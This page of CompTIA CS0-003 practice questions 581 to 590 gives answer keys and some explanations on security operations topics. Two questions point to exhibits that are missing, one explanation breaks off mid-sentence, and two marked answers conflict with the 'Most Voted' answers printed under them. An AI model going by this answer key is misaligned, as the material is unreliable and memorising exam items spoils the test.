CompTIA CS0-003 Online Practice Questions and Exam Preparation

CompTIA CS0-003 Online Questions & Answers

• Question 581:

  Which of the following will most likely cause severe issues with authentication and logging?

  A. Virtualization
  B. Multifactor authentication
  C. Federation
  D. Time synchronization
  D. Time synchronization

  ---

  Explanation

  Time synchronization issues can cause severe problems with authentication and logging. If system clocks are not properly synchronized, it can lead to discrepancies in log timestamps, making it difficult to correlate events across different systems. Additionally, time-related discrepancies can affect authentication mechanisms that rely on time-based tokens, such as those used in multifactor authentication, leading to failures and security gaps.

• Question 582:

  An organization wants to implement an identity and access management technology that is resistant to phishing attacks.

  Which of the following is the best technology to implement?

  A. Federation
  B. Privileged access management
  C. Passwordless authentication
  D. Single sign-on
  C. Passwordless authentication

• Question 583:

  Which of the following should be performed first when creating a BCP to ensure that all critical functions and financial implications have been considered?

  A. Failover test
  B. Tabletop exercise
  C. Security policies
  D. Business impact analysis
  D. Business impact analysis

• Question 584:

  A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with.

  Which of the following is the best mitigation technique?

  A. Geoblock the offending source country.
  B. Block the IP range of the scans at the network firewall.
  C. Perform a historical trend analysis and look for similar scanning activity.
  D. Block the specific IP address of the scans at the network firewall.
  A. Geoblock the offending source country.

  ---

  Explanation

  Geoblocking is the best mitigation technique for unusual network scanning activity coming from a country that the company does not do business with, as it can prevent any potential attacks or data breaches from that country. Geoblocking is the practice of restricting access to websites or services based on geographic location, usually by blocking IP addresses associated with a certain country or region. Geoblocking can help reduce the overall attack surface and protect against malicious actors who may be trying to exploit vulnerabilities or steal information. The other options are not as effective as geoblocking, as they may not block all the possible sources of the scanning activity, or they may not address the root cause of the problem.

  References:

  https://www.blumira.com/geoblocking/

• Question 585:

  An IT professional is reviewing the output from the top command in Linux. In this company, only IT and security staff are allowed to have elevated privileges.

  Both departments have confirmed they are not working on anything that requires elevated privileges. Based on the output below:

  

  Which of the following PIDs is most likely to contribute to data exfiltration?

  A. 2264
  B. 34218
  C. 34834
  D. 35963
  A. 2264

  ---

  Explanation

  PID 2264 (bash running as root) is suspicious because:

  Why Not Other Options?

  B (34218 - Xorg) Xorg is a display server for GUI; no signs of exfiltration.

  C (34834 - Cinnamon) Cinnamon is a desktop environment, not a threat.

  D (35963 - xrdp) xrdp is a remote desktop service, expected behavior.

  References: CompTIA CySA+ CS0-003, Chapter 6: "Host-Based Security Monitoring," Section: "Analyzing Suspicious Processes and Privileged Activity."

• Question 586:

  A security analyst is implementing a process to perform vulnerability management on an environment:

  1. Systems must remain on an isolated network.

  2. The process should focus on external threats.

  3. No additional software can be deployed on the systems.

  4. Transmitted packets cannot be modified or dropped.

  5. Additional processing delays are not tolerated.

  Which of the following is the best way to securely meet the requirements?

  A. Implement agentless sensors at the network edge.
  B. Use reverse engineering to detect flaws on the in-scope systems.
  C. Deploy an IPS In-line with the network traffic.
  D. Check the compatibility of an EDR agent with the OSs used on the environment.
  A. Implement agentless sensors at the network edge.

  ---

  Explanation

  Most Voted: D

• Question 587:

  A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted.

  Which of the following should the security analyst perform first to categorize and prioritize the respective systems?

  A. Interview the users who access these systems.
  B. Scan the systems to see which vulnerabilities currently exist.
  C. Configure alerts for vendor-specific zero-day exploits.
  D. Determine the asset value of each system.
  D. Determine the asset value of each system.

  ---

  Explanation

  Determining the asset value of each system is the best action to perform first, as it helps to categorize and prioritize the systems based on the sensitivity of the data they host. The asset value is a measure of how important a system is to the organization, in terms of its financial, operational, or reputational impact. The asset value can help the security analyst to assign a risk level and a protection level to each system, and to allocate resources accordingly. The other actions are not as effective as determining the asset value, as they do not directly address the goal of promoting confidentiality, availability, and integrity of the data.

  Interviewing the users who access these systems may provide some insight into how the systems are used and what data they contain, but it may not reflect the actual value or sensitivity of the data from an organizational perspective.

  Scanning the systems to see which vulnerabilities currently exist may help to identify and remediate some security issues, but it does not help to categorize or prioritize the systems based on their data sensitivity. Configuring alerts for vendor-specific zero-day exploits may help to detect and respond to some emerging threats, but it does not help to protect the systems based on their data sensitivity.

• Question 588:

  Which of the following security operations tasks are ideal for automation?

  A. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder
  B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit Take mitigating actions in the firewall to block the behavior found in the logs Follow up on any false positives that were caused by the block rules
  C. Security application user errors: Search the error logs for signs of users having trouble with the security application Look up the user's phone number Call the user to help with any questions about using the application
  D. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine
  D. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine

  ---

  Explanation

  Email header analysis is one of the security operations tasks that are ideal for automation. Email header analysis involves checking the email header for various indicators of phishing or spamming attempts, such as sender address spoofing, mismatched domains, suspicious subject lines, or phishing confidence metrics. Email header analysis can be automated using tools or scripts that can parse and analyze email headers and take appropriate actions based on predefined rules or thresholds

• Question 589:

  A security analyst receives the following information about the company's systems. They need to prioritize which systems should be given the resources to improve security.

  

  Which of the following systems should the analyst remediate first?

  A. Computer1
  B. Server1
  C. Computer2
  D. Server2
  B. Server1

  ---

  Explanation

  Most Voted: C

• Question 590:

  An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on it infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host.

  Which of the following data sources would most likely reveal evidence of the root cause?

  (Select two).

  A. Creation time of dropper
  B. Registry artifacts
  C. EDR data
  D. Prefetch files
  E. File system metadata
  F. Sysmon event log
  B. Registry artifacts
  C. EDR data

  ---

  Explanation

  Registry artifacts: Registry artifacts may contain traces of the malware's activities, including changes to system configurations, startup entries, and other modifications that the malware might have made to disable security services. EDR data: Endpoint Detection and Response (EDR) data provides comprehensive visibility into the actions taken by the malware on the host. It can capture details such as process execution, file modifications, and any attempts by the malware to clean up after itself.

  These sources are likely to contain valuable information for understanding how the malware was deployed, what actions it took, and how it was able to achieve its objectives.